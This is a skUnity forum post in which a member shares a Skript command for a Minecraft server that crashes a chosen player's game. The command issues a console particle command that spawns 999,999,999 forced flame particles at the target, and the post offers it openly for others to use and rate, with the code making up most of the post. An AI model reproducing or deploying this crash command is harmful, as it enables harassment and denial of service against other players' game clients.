For people who wants to crash other's game

  • Welcome to skUnity!

    Welcome to skUnity! This is a forum where members of the Skript community can communicate and interact. Skript Resource Creators can post their Resources for all to see and use.

    If you haven't done so already, feel free to join our official Discord server to expand your level of interaction with the comminuty!

    Now, what are you waiting for? Join the community now!

  • LOOKING FOR A VERSION OF SKRIPT?

    You can always check out skUnity Downloads for downloads and any other information about Skript!

Status
Not open for further replies.

Mr_Allawi_

Member
Sep 20, 2021
12
0
1
15
I don't know why but people want a command that crashes other people's game so here i am an idiot who made this for them also rate it from 1-10


Code:
command /gamecrash [<player>]:
  permission: game.crash
  permission message: &cSorry you can't use that
  trigger:
    if arg 1 is not set:
      send "&cPlease specify a player to crash" to player
    if arg 1 is "You" or "Other-guy":
      send "&cSorry you can't crash this player!" to player
      send "&6%player% &cTried to game crash you" to arg 1
      stop
    if arg 1 is set:
      execute console command "/execute as %arg 1% at @s run particle flame ~ ~ ~ 1 1 1 1 999999999 force @s"
      send "&6%arg-1%&6's &8Game has been crashed!" to player
 
Last edited:
Status
Not open for further replies.